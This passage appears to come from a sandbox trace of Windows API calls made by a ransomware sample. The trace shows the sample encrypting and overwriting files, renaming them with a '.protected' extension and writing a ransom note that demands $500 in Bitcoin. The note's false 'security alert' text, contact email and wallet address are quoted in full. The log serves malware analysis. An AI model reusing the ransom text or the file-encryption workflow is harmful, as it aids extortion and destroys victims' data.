Explorer\\DOMStore\\3O75JDME\\RESTORE_FILES.txt") returned 114 [0089.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.240] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.240] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.240] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.240] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.240] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.241] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.241] CloseHandle (hObject=0x150) returned 1 [0089.241] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0089.241] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0089.241] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0089.241] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0089.241] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0089.241] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.241] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0089.241] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0089.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0089.241] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0089.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 97 [0089.241] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0089.241] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.263] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.263] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.263] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.263] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.263] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.263] CloseHandle (hObject=0x150) returned 1 [0089.264] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.protected") returned 107 [0089.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.protected")) returned 1 [0089.264] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="Windows") returned -1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="Program Files") returned 1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="Program Files (x86)") returned 1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="$Recycle.bin") returned 1 [0089.264] lstrcmpiW (lpString1="UV0DUWVB", lpString2="System Volume Information") returned 1 [0089.264] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB") returned 96 [0089.265] lstrcmpW (lpString1="UV0DUWVB", lpString2=".") returned 1 [0089.265] lstrcmpW (lpString1="UV0DUWVB", lpString2="..") returned 1 [0089.265] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*") returned 98 [0089.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.265] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.265] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.265] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.265] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.265] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.265] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\.") returned 98 [0089.265] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.265] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.265] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.265] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.265] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\uv0duwvb\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.265] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.265] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.265] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.265] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.265] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.265] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.266] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\..") returned 99 [0089.266] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.266] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.266] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.266] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.266] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.266] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.266] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.266] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.266] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\RESTORE_FILES.txt") returned 114 [0089.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\uv0duwvb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.266] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.267] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.267] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.267] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.267] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.267] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.267] CloseHandle (hObject=0x150) returned 1 [0089.267] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.267] lstrcmpiW (lpString1="VGMTOI09", lpString2="Windows") returned -1 [0089.267] lstrcmpiW (lpString1="VGMTOI09", lpString2="Program Files") returned 1 [0089.267] lstrcmpiW (lpString1="VGMTOI09", lpString2="Program Files (x86)") returned 1 [0089.268] lstrcmpiW (lpString1="VGMTOI09", lpString2="$Recycle.bin") returned 1 [0089.268] lstrcmpiW (lpString1="VGMTOI09", lpString2="System Volume Information") returned 1 [0089.268] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09") returned 96 [0089.268] lstrcmpW (lpString1="VGMTOI09", lpString2=".") returned 1 [0089.268] lstrcmpW (lpString1="VGMTOI09", lpString2="..") returned 1 [0089.268] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*") returned 98 [0089.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.268] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.268] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.268] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.268] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.268] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.268] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\.") returned 98 [0089.268] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.268] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.268] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.268] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.268] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.268] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.268] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.268] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.268] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.268] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\..") returned 99 [0089.268] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.268] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.268] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.268] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.269] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="Windows") returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="Program Files") returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="Program Files (x86)") returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="$Recycle.bin") returned 1 [0089.269] lstrcmpiW (lpString1="www.msn[1].xml", lpString2="System Volume Information") returned 1 [0089.269] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0089.269] StrStrIW (lpFirst="www.msn[1].xml", lpSrch=".protected") returned 0x0 [0089.269] lstrcmpW (lpString1="www.msn[1].xml", lpString2="RESTORE_FILES.txt") returned 1 [0089.269] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.269] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0089.270] StrStrW (lpFirst="www.msn[1].xml", lpSrch=".txt") returned 0x0 [0089.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0089.270] StrStrW (lpFirst="www.msn[1].xml", lpSrch=".rar") returned 0x0 [0089.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0089.270] StrStrW (lpFirst="www.msn[1].xml", lpSrch=".zip") returned 0x0 [0089.270] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x344, lpOverlapped=0x0) returned 1 [0089.280] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffcbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.280] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x344, lpOverlapped=0x0) returned 1 [0089.280] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.280] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.280] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 